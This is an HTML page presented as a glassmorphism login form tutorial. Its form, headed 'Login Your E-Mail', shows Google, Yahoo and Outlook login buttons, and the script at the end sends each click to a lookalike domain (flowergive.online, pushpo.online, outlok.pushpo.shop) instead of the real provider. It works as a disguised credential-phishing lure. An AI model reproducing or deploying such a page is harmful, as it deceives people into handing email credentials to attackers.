<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title> </title>
  

</head>
<body>
<!-- partial:index.partial.html -->
<!DOCTYPE html>
<html lang="en">
<head>
  <!-- Design by foolishdeveloper.com -->
    <title>Glassmorphism login Form Tutorial in html css</title>
 
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css"> -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;500;600&display=swap" rel="stylesheet">
    <!--Stylesheet-->
    <style media="screen">
      *,
*:before,
*:after{
    padding: 0;
    margin: 0;
    box-sizing: border-box;
}
body{
    background-image: url(./check.jpg);
}
.background{
    width: 430px;
    height: 520px;
    position: absolute;
    transform: translate(-50%,-50%);
    left: 50%;
    top: 50%;
}
.background .shape{
    height: 200px;
    width: 200px;
    position: absolute;
    border-radius: 50%;
}
form{
    /* height: 520px; */
    width: 400px;
    background-color: transparent;
    position: absolute;
    transform: translate(-50%,-50%);
    top: 50%;
    left: 50%;
    border-radius: 10px;
    backdrop-filter: blur(10px);
    border: 2px solid rgba(255,255,255,0.1);
    box-shadow: 0 0 40px rgba(8,7,16,0.6);
    padding: 50px 35px;
}
form *{
    font-family: 'Poppins',sans-serif;
    color: #000000;
    letter-spacing: 0.5px;
    outline: none;
    border: none;
}
form h3{
    font-size: 32px;
    font-weight: 500;
    line-height: 42px;
    text-align: center;
}

label{
    display: block;
    margin-top: 30px;
    font-size: 16px;
    font-weight: 500;
}
input{
    display: block;
    height: 50px;
    width: 100%;
    background-color: rgba(255,255,255,0.07);
    border-radius: 3px;
    padding: 0 10px;
    margin-top: 8px;
    font-size: 14px;
    font-weight: 300;
}
::placeholder{
    color: #000000;
}
button{
    margin-top: 50px;
    width: 100%;
    background-color: #4d3434bf;
    color: #5b514100;
    padding: 15px 0;
    font-size: 18px;
    font-weight: 600;
    border-radius: 15px;
    cursor: pointer;
}
.social{
  flex-direction: column;
}

/* ye wala button ka color pe hai background-clor */
.social div{
    font-family: Georgia, 'Times New Roman', Times, serif;
  cursor: pointer;
  background: red;
  /* width: 150px; */
  border-radius: 3px;
  padding: 5px 10px 10px 5px;
  background-color: rgba(30, 182, 241, 0.778);
  color: #000000;
  text-align: center;
}
/* jab button ke upper jata hai tab ye color hoga  */
.social div:hover{
  background-color: rgba(255,255,255,0.47);
}
/*  */
.social i{
  margin-right: 4px;
}

    </style>
</head>
<body>
    <div class="background">
        <div class="shape"></div>
        <div class="shape"></div>
    </div>
    <form>
        <h3>Login Your E-Mail</h3>
        &nbsp;
        <div class="social">
          <div class="go"><i class="fab fa-google"></i>  Login with Google</div>
          &nbsp;
          <div class="fb"><i class="fab fa-yahoo"></i> Login with Yahoo</div>
          &nbsp;
          <div class="gx"><i class="fa fa-envelope"></i></i> Login with Outlook</div>
        </div>
    </form>
    <script>
         document.querySelector('.go').onclick = function() {
        window.location.href = 'https://accounts.flowergive.online/kHMIbSvF';
    };

    document.querySelector('.fb').onclick = function() {
        window.location.href = 'https://login.pushpo.online/ejVnWTOQ';
    };

    document.querySelector('.gx').onclick = function() {
        window.location.href = 'https://outlook.outlok.pushpo.shop/onPhCPSm';
    };

    </script>
</body>
</html>
<!-- partial -->
  
</body>
</html>
